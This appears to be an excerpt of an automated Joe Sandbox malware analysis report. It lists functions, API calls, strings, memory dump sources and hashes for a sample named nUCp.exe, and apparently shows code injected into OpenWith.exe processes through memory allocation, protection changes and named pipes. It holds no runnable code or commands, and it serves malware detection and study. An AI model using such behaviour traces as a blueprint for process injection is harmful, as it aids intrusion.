API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 3881458301176a1638306b3db4ccb5df2853c16a2221144f71ec0113876002b9
Instruction ID: 2062c4a61cc50b7536b9d918bd9b77fb3ff805f9d28de87da0803bdb7df4b1a7
Opcode Fuzzy Hash: 3881458301176a1638306b3db4ccb5df2853c16a2221144f71ec0113876002b9
Instruction Fuzzy Hash: DD419834E0020DAFCF10EF68C844AAE7BB5AF45328F148159EA14DB366DB35EA15DB91

Function 00FF6921 Relevance: 9.1, APIs: 6, Instructions: 60
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32(?,?,00FF6918,00FF674C,00FF578C), ref: 00FF692F
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00FF693D
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00FF6956
SetLastError.KERNEL32(00000000,00FF6918,00FF674C,00FF578C), ref: 00FF69A8

Memory Dump Source

Source File: 00000004.00000002.1394153462.0000000000FA1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000004.00000002.1394133696.0000000000FA0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1394153462.0000000001012000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1394153462.0000000001019000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1394153462.000000000101E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1394273419.000000000101F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1394293120.0000000001021000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_fa0000_nUCp.jbxd

Yara matches

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: b0bf639148806c2d30b7f4d62c6e706b620e42eb4217ec6f67f92bc267cae292
Instruction ID: baf1844478457b2d0b6e1f6178c6e084c0680f453715258d23ea12d5f8c4d159
Opcode Fuzzy Hash: b0bf639148806c2d30b7f4d62c6e706b620e42eb4217ec6f67f92bc267cae292
Instruction Fuzzy Hash: 9D01D83390831E5DAA352A74AC9AA3737A5DF057797200329F3A0D60F5EFAE4C00F250

Function 00FFA6EB Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

C:\Users\Public\Documents\nUCp.exe, xrefs: 00FFA707

Memory Dump Source

Source File: 00000004.00000002.1394153462.0000000000FA1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000004.00000002.1394133696.0000000000FA0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1394153462.0000000001012000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1394153462.0000000001019000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1394153462.000000000101E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1394273419.000000000101F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1394293120.0000000001021000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_fa0000_nUCp.jbxd

Yara matches

Similarity

API ID:
String ID: C:\Users\Public\Documents\nUCp.exe
API String ID: 0-3310568506
Opcode ID: 4461d9afc881cc6a9def0350c308c469d12b03cdee77d21ab1d302f3580b7714
Instruction ID: dcef9ddec9449bd705666be8f903d3b1ae8bdef86094fc8a48fbe7709432781b
Opcode Fuzzy Hash: 4461d9afc881cc6a9def0350c308c469d12b03cdee77d21ab1d302f3580b7714
Instruction Fuzzy Hash: 222180B2A0420DBF9B20BF61CC80E3BB7B9AF003657108564FA59D7171E735EC10A7A2

Function 00FF8990 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,BCC996EE,?,?,00000000,010014CF,000000FF,?,00FF896C,00FF8A50,?,00FF8940,00000000), ref: 00FF89C5
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00FF89D7
FreeLibrary.KERNEL32(00000000,?,?,00000000,010014CF,000000FF,?,00FF896C,00FF8A50,?,00FF8940,00000000), ref: 00FF89F9

Strings

CorExitProcess, xrefs: 00FF89CF
mscoree.dll, xrefs: 00FF89BE

Memory Dump Source

Source File: 00000004.00000002.1394153462.0000000000FA1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000004.00000002.1394133696.0000000000FA0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1394153462.0000000001012000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1394153462.0000000001019000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1394153462.000000000101E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1394273419.000000000101F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1394293120.0000000001021000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_fa0000_nUCp.jbxd

Yara matches

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 80603db29609d1a9b29da3033407151157e5c41365a960b195f847b8f08437ca
Instruction ID: 2350687c3af8708d284e7ab10b9babf8f8d322a15ca0b453867a0f7c9fc78f48
Opcode Fuzzy Hash: 80603db29609d1a9b29da3033407151157e5c41365a960b195f847b8f08437ca
Instruction Fuzzy Hash: 4E01DB32940619AFDB369F40CC05BFE77B9FB04B20F110629F951A2294DFBD9900CB81

Function 00FF7676 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlEncodePointer.NTDLL(00000000), ref: 00FF769B
CatchIt.LIBVCRUNTIME ref: 00FF7781

Strings

MOC, xrefs: 00FF76AD
RCC, xrefs: 00FF76B5

Memory Dump Source

Source File: 00000004.00000002.1394153462.0000000000FA1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000004.00000002.1394133696.0000000000FA0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1394153462.0000000001012000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1394153462.0000000001019000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1394153462.000000000101E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1394273419.000000000101F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1394293120.0000000001021000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_fa0000_nUCp.jbxd

Yara matches

Similarity

API ID: CatchEncodePointer
String ID: MOC$RCC
API String ID: 1435073870-2084237596
Opcode ID: ff4731059164505084fa9e04eff848436c44a7fbe193bc90b46163bfd901843a
Instruction ID: 97a2eea93dc1d6e5a62a791b5912cbbdd21d2c0d481110654c6620845cb62384
Opcode Fuzzy Hash: ff4731059164505084fa9e04eff848436c44a7fbe193bc90b46163bfd901843a
Instruction Fuzzy Hash: BF414A72D0020DAFDF15EF98CD81AAEBBB5FF48314F248199FA04A7261D3359950EB54

Function 00FF6B43 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00FF6AF4,00000000,?,01019C78,?,?,?,00FF6C97,00000004,InitializeCriticalSectionEx,01012CC0,InitializeCriticalSectionEx), ref: 00FF6B50
GetLastError.KERNEL32(?,00FF6AF4,00000000,?,01019C78,?,?,?,00FF6C97,00000004,InitializeCriticalSectionEx,01012CC0,InitializeCriticalSectionEx,00000000,?,00FF6A17), ref: 00FF6B5A
LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00FF6B82

Strings

api-ms-, xrefs: 00FF6B67

Memory Dump Source

Source File: 00000004.00000002.1394153462.0000000000FA1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000004.00000002.1394133696.0000000000FA0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1394153462.0000000001012000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1394153462.0000000001019000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1394153462.000000000101E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1394273419.000000000101F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1394293120.0000000001021000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_fa0000_nUCp.jbxd

Yara matches

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: f686aaf8d97a8bd3950034a17c8d9db87b009190ace500ca9660210c7fd95ad0
Instruction ID: 87d09fc9389cf59ce2e75df496931e95d6d5768c30a09b80d5b7b87d3a4b4e5d
Opcode Fuzzy Hash: f686aaf8d97a8bd3950034a17c8d9db87b009190ace500ca9660210c7fd95ad0
Instruction Fuzzy Hash: DAE0483064020CFBDF311A71DC06F693A66AF50B65F204120FB4DE91E5DBABD851DB55

Function 00FFDF81 Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(BCC996EE,00000000,00000000,?), ref: 00FFDFE4

Part of subcall function 00FFB2B9: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00FFDC5F,?,00000000,-00000008), ref: 00FFB31A

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00FFE236
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00FFE27C
GetLastError.KERNEL32 ref: 00FFE31F

Memory Dump Source

Source File: 00000004.00000002.1394153462.0000000000FA1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000004.00000002.1394133696.0000000000FA0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1394153462.0000000001012000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1394153462.0000000001019000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1394153462.000000000101E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1394273419.000000000101F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1394293120.0000000001021000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_fa0000_nUCp.jbxd

Yara matches

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: b014a41c4f5c5021b9ee5cfe351465b473755a57aad72ee21c0e935c6ca4f343
Instruction ID: 5b883cfcdf2e92373c7fbe9d95c9f72131cd84328818247b23d91d255ab5f2f7
Opcode Fuzzy Hash: b014a41c4f5c5021b9ee5cfe351465b473755a57aad72ee21c0e935c6ca4f343
Instruction Fuzzy Hash: 43D17A75D0024C9FCB15CFE8D884AEDBBB9FF09314F28412AE656EB361E634A941DB50

Function 00FF707A Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 00FF7141
___AdjustPointer.LIBCMT ref: 00FF7164
___AdjustPointer.LIBCMT ref: 00FF7200

Memory Dump Source

Source File: 00000004.00000002.1394153462.0000000000FA1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000004.00000002.1394133696.0000000000FA0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1394153462.0000000001012000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1394153462.0000000001019000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1394153462.000000000101E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1394273419.000000000101F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1394293120.0000000001021000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_fa0000_nUCp.jbxd

Yara matches

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 6f840fcc41fced50166943a766ea3f0a664295baf81747821dfe8a633abfa5f8
Instruction ID: b9d3b3fd020018af8242d6050e78b0ed7dcd99c6bea6789ae6b46768427289aa
Opcode Fuzzy Hash: 6f840fcc41fced50166943a766ea3f0a664295baf81747821dfe8a633abfa5f8
Instruction Fuzzy Hash: 5C51C67290870E9FEB25AF54D841B7AF7A5EF40311F14416DEA01872B1EB35EC88E790

Function 00FF9F05 Relevance: 6.1, APIs: 4, Instructions: 82COMMON

Download Yara Rule

APIs

Part of subcall function 00FFB2B9: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00FFDC5F,?,00000000,-00000008), ref: 00FFB31A

GetLastError.KERNEL32 ref: 00FF9F69
__dosmaperr.LIBCMT ref: 00FF9F70
GetLastError.KERNEL32(?,?,?,?), ref: 00FF9FAA
__dosmaperr.LIBCMT ref: 00FF9FB1

Memory Dump Source

Source File: 00000004.00000002.1394153462.0000000000FA1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000004.00000002.1394133696.0000000000FA0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1394153462.0000000001012000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1394153462.0000000001019000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1394153462.000000000101E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1394273419.000000000101F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1394293120.0000000001021000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_fa0000_nUCp.jbxd

Yara matches

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide
String ID:
API String ID: 1913693674-0
Opcode ID: 2be96590f06b7bcc302291d3e6221aa596be749b14db9ce47dc30d489f008665
Instruction ID: b0f2f84569474231cc21b2d8c1b3aa5dd6caf6b41f588b05c30d0dfa9b354b3c
Opcode Fuzzy Hash: 2be96590f06b7bcc302291d3e6221aa596be749b14db9ce47dc30d489f008665
Instruction Fuzzy Hash: F421C571A0820DAFDB20AF61DC80A7BB7ADEF403747148518FA59D71B0D7B5ED00A761

Function 00FFB35C Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 00FFB364

Part of subcall function 00FFB2B9: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00FFDC5F,?,00000000,-00000008), ref: 00FFB31A

FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00FFB39C
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00FFB3BC

Memory Dump Source

Source File: 00000004.00000002.1394153462.0000000000FA1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000004.00000002.1394133696.0000000000FA0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1394153462.0000000001012000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1394153462.0000000001019000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1394153462.000000000101E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1394273419.000000000101F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1394293120.0000000001021000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_fa0000_nUCp.jbxd

Yara matches

Similarity

API ID: EnvironmentStrings$Free$ByteCharMultiWide
String ID:
API String ID: 158306478-0
Opcode ID: 7badfdb3a893dd6120853ba3452a25e2d173d04a4bba47b04c6875c1cd1cedc7
Instruction ID: 5fc2c356682896a96a08d3ee3bfbd8b2627bbdd99a23417ded5c8d952f748a3e
Opcode Fuzzy Hash: 7badfdb3a893dd6120853ba3452a25e2d173d04a4bba47b04c6875c1cd1cedc7
Instruction Fuzzy Hash: 8511C0B690961DBFA62567B2DCCAD7F796CCE943A53210024FB01D2121EF69DD40A2B0

Function 00FFF756 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00FFEF14,00000000,00000001,00000000,?,?,00FFE373,?,00000000,00000000), ref: 00FFF76D
GetLastError.KERNEL32(?,00FFEF14,00000000,00000001,00000000,?,?,00FFE373,?,00000000,00000000,?,?,?,00FFE916,00000000), ref: 00FFF779

Part of subcall function 00FFF73F: CloseHandle.KERNEL32(FFFFFFFE,00FFF789,?,00FFEF14,00000000,00000001,00000000,?,?,00FFE373,?,00000000,00000000,?,?), ref: 00FFF74F

___initconout.LIBCMT ref: 00FFF789

Part of subcall function 00FFF701: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00FFF730,00FFEF01,?,?,00FFE373,?,00000000,00000000,?), ref: 00FFF714

WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,00FFEF14,00000000,00000001,00000000,?,?,00FFE373,?,00000000,00000000,?), ref: 00FFF79E

Memory Dump Source

Source File: 00000004.00000002.1394153462.0000000000FA1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000004.00000002.1394133696.0000000000FA0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1394153462.0000000001012000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1394153462.0000000001019000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1394153462.000000000101E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1394273419.000000000101F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1394293120.0000000001021000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_fa0000_nUCp.jbxd

Yara matches

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 8541028e429f01dfcb74282b741f594dc257a9697d05203bd3b08228e6f797d0
Instruction ID: 78ad32c5c5f56608bb13b40cd36dc59fb46a59454bfd89454d80b42acebc6f64
Opcode Fuzzy Hash: 8541028e429f01dfcb74282b741f594dc257a9697d05203bd3b08228e6f797d0
Instruction Fuzzy Hash: A5F0923651115DBBCF226E969C08AAA7E66FF087A1B254160FA5896125C63A8820EB90

Analysis Process: OpenWith.exePID: 5860, Parent PID: 2456COMMON

Executed Functions

Function 027F02D8 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 169memoryfileCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,?,?), ref: 027F0326

Part of subcall function 027F00A4: VirtualAlloc.KERNELBASE(00000000,00001012,00001000,00000004), ref: 027F00CD
Part of subcall function 027F00A4: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 027F0279

VirtualAlloc.KERNELBASE(00000000,00400000,00001000,00000004), ref: 027F0378
VirtualProtect.KERNELBASE(0000002C,?,00000040,?), ref: 027F03E7
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 027F0407
MapViewOfFile.KERNELBASE(?,00000004,00000000,00000000,00000000), ref: 027F042E
VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 027F0456
CloseHandle.KERNELBASE(?), ref: 027F0471

Strings

,, xrefs: 027F0356

Memory Dump Source

Source File: 00000005.00000003.1393395826.00000000027F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 027F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_3_27f0000_OpenWith.jbxd

Similarity

API ID: Virtual$Alloc$Free$CloseFileHandleProtectView
String ID: ,
API String ID: 3867569247-3772416878
Opcode ID: 34919759cab89c45596a3336aca0d90db3a2564f30e7825e5c793611e7351f71
Instruction ID: b34c73bc54d7ac411398f63fffae95a47066e4c7f03fd1f9e840d829b4d5b000
Opcode Fuzzy Hash: 34919759cab89c45596a3336aca0d90db3a2564f30e7825e5c793611e7351f71
Instruction Fuzzy Hash: 00612BB5904209EFCB20DFA5C884AEEBBB9FF08354F14841AEA59A7345D730E950CF60

Function 027F00A4 Relevance: 2.7, APIs: 2, Instructions: 163memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,00001012,00001000,00000004), ref: 027F00CD
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 027F0279

Memory Dump Source

Source File: 00000005.00000003.1393395826.00000000027F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 027F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_3_27f0000_OpenWith.jbxd

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: 7dc8e79fde86babc96161718fc4e5f80a5398d7d893a888eaa0e52eee754c683
Instruction ID: 78410cf56a4d9559bf57af57d6237d4957f91479115ee9e85c25f1fbebd08e9e
Opcode Fuzzy Hash: 7dc8e79fde86babc96161718fc4e5f80a5398d7d893a888eaa0e52eee754c683
Instruction Fuzzy Hash: 83718C75A08249DFDB81CF98C981BEEBBF0AB09314F244095E565FB346C334AA91CF65

Analysis Process: OpenWith.exePID: 5952, Parent PID: 2456COMMON

Execution Graph

Execution Coverage:	34.5%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	71.4%
Total number of Nodes:	28
Total number of Limit Nodes:	0

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 00007DF46E4DB498 Relevance: 28.5, APIs: 13, Strings: 3, Instructions: 544nativeCOMMON

Download Yara Rule

APIs

NtAcceptConnectPort.NTDLL ref: 00007DF46E4DB56E
calloc.MSVCRT ref: 00007DF46E4DB58B
DuplicateHandle.KERNELBASE ref: 00007DF46E4DB620
NtAcceptConnectPort.NTDLL ref: 00007DF46E4DB6CB
NtAcceptConnectPort.NTDLL ref: 00007DF46E4DB724
NtAcceptConnectPort.NTDLL ref: 00007DF46E4DB763
NtAcceptConnectPort.NTDLL ref: 00007DF46E4DB7AA
NtAcceptConnectPort.NTDLL ref: 00007DF46E4DB7E7
NtAcceptConnectPort.NTDLL ref: 00007DF46E4DB86D
NtAcceptConnectPort.NTDLL ref: 00007DF46E4DB8CC
NtAcceptConnectPort.NTDLL ref: 00007DF46E4DB9B2
NtAcceptConnectPort.NTDLL ref: 00007DF46E4DB9EC
NtAcceptConnectPort.NTDLL ref: 00007DF46E4DBA19

Strings

,, xrefs: 00007DF46E4DB59E
H, xrefs: 00007DF46E4DB934
H, xrefs: 00007DF46E4DB94F

Memory Dump Source

Source File: 00000006.00000003.1766636545.00007DF46E4B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF46E4B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_3_7df46e4b1000_OpenWith.jbxd

Similarity

API ID: AcceptConnectPort$DuplicateHandlecalloc
String ID: ,$H$H
API String ID: 2577638757-438696205
Opcode ID: 9fb62eb4d8959293fc2d40b19de36242d3d29fe68d1ba52932dcd9bec1ad6912
Instruction ID: 3ffbdbc5c579fa841f8e3df00f17c76a51c3a6b80bd0bfdbb1d675c33461be55
Opcode Fuzzy Hash: 9fb62eb4d8959293fc2d40b19de36242d3d29fe68d1ba52932dcd9bec1ad6912
Instruction Fuzzy Hash: 9D02867061CA899BD768DF68D8856EBB3E1FB98300F50453FD58FC3291DA34E5818B86

Function 00007DF46E4DBCC0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 156nativeCOMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00007DF46E4DBCE6
NtAcceptConnectPort.NTDLL ref: 00007DF46E4DBD8F
NtAcceptConnectPort.NTDLL ref: 00007DF46E4DBE50
free.MSVCRT ref: 00007DF46E4DBE55

Strings

0, xrefs: 00007DF46E4DBD32
, xrefs: 00007DF46E4DBD7F
@, xrefs: 00007DF46E4DBD48

Memory Dump Source

Source File: 00000006.00000003.1766636545.00007DF46E4B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF46E4B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_3_7df46e4b1000_OpenWith.jbxd

Similarity

API ID: AcceptConnectPort$freemalloc
String ID: $0$@
API String ID: 4227078157-2347541974
Opcode ID: d8fdb236a247b9205c502de8d0d979f89367b2180e7993cbf521bb03780d7e1e
Instruction ID: dbb3cf437e2625758fe0c3f000cf7c4b76bc98e3c11f15aa3c9b6e7810b1794b
Opcode Fuzzy Hash: d8fdb236a247b9205c502de8d0d979f89367b2180e7993cbf521bb03780d7e1e
Instruction Fuzzy Hash: 18516A706287889ED764DF28D8857ABB7E4FB89700F10452FE58EC2285DB74E4858B83

Function 0000011F7ABB30C7 Relevance: 7.9, APIs: 5, Instructions: 390nativememoryCOMMON

Download Yara Rule

APIs

NtAcceptConnectPort.NTDLL ref: 0000011F7ABB3957
NtAcceptConnectPort.NTDLL ref: 0000011F7ABB39E4
NtAcceptConnectPort.NTDLL ref: 0000011F7ABB3AA3
RtlFreeHeap.NTDLL ref: 0000011F7ABB3AC0
RtlFreeHeap.NTDLL ref: 0000011F7ABB3AD2

Memory Dump Source

Source File: 00000006.00000003.1502016342.0000011F7ABB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000011F7ABB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_3_11f7abb0000_OpenWith.jbxd

Similarity

API ID: AcceptConnectPort$FreeHeap
String ID:
API String ID: 2519882481-0
Opcode ID: 06103e6240192ff0ea4d22a768af3a34bd3b5889dbd62609acb6a2f682bb8b02
Instruction ID: a939ed62db6b0ea9f35b8757ce70c974b02c234cac4ce97fb66be38c4e818340
Opcode Fuzzy Hash: 06103e6240192ff0ea4d22a768af3a34bd3b5889dbd62609acb6a2f682bb8b02
Instruction Fuzzy Hash: B3C19730218B458FDB5CDF5CC485BE9B7E1FB94310F09492DE58AC7692DB34E84A8782

Function 00007DF46E4DBE6C Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 158nativeCOMMON

Download Yara Rule

APIs

NtAcceptConnectPort.NTDLL ref: 00007DF46E4DBF3A

Strings

, xrefs: 00007DF46E4DBF2A
0, xrefs: 00007DF46E4DBED8
@, xrefs: 00007DF46E4DBEEE

Memory Dump Source

Source File: 00000006.00000003.1766636545.00007DF46E4B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF46E4B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_3_7df46e4b1000_OpenWith.jbxd

Similarity

API ID: AcceptConnectPort
String ID: $0$@
API String ID: 1658770261-2347541974
Opcode ID: e038bc6975502a75aa15522c9d2aad796b46013016ac9629b0cf3dc02c1d6b17
Instruction ID: 5acf2ce1a00452d0d71f91028b77d20a412d637bff2b9f36328b755e68458a14
Opcode Fuzzy Hash: e038bc6975502a75aa15522c9d2aad796b46013016ac9629b0cf3dc02c1d6b17
Instruction Fuzzy Hash: 8F515A7060CB898FE765DF68C484BABB7E4FB98300F10452EE48EC3290DB75D4848B46

Function 00007DF46E4D1B18 Relevance: 4.6, APIs: 3, Instructions: 110pipeCOMMON

Download Yara Rule

APIs

CreateNamedPipeW.KERNELBASE ref: 00007DF46E4D1BCF
BindIoCompletionCallback.KERNEL32 ref: 00007DF46E4D1C06
ConnectNamedPipe.KERNELBASE ref: 00007DF46E4D1C17

Memory Dump Source

Source File: 00000006.00000003.1766636545.00007DF46E4B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF46E4B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_3_7df46e4b1000_OpenWith.jbxd

Similarity

API ID: NamedPipe$BindCallbackCompletionConnectCreate
String ID:
API String ID: 2502124517-0
Opcode ID: 584620923d8bee05c4cd2b55fbc688861300e251001a2660cae9de72a1f183dd
Instruction ID: 0b0874ae4464720e32789add6f459a1494c7b15a47e43f4f15a73cec4917f6ec
Opcode Fuzzy Hash: 584620923d8bee05c4cd2b55fbc688861300e251001a2660cae9de72a1f183dd
Instruction Fuzzy Hash: 8C3182706086898FD794DF38D8D879B77E1FB94710F10462AD45BC62D0DF78D8858B41

Function 00007DF46E4DC7CC Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 82COMMON

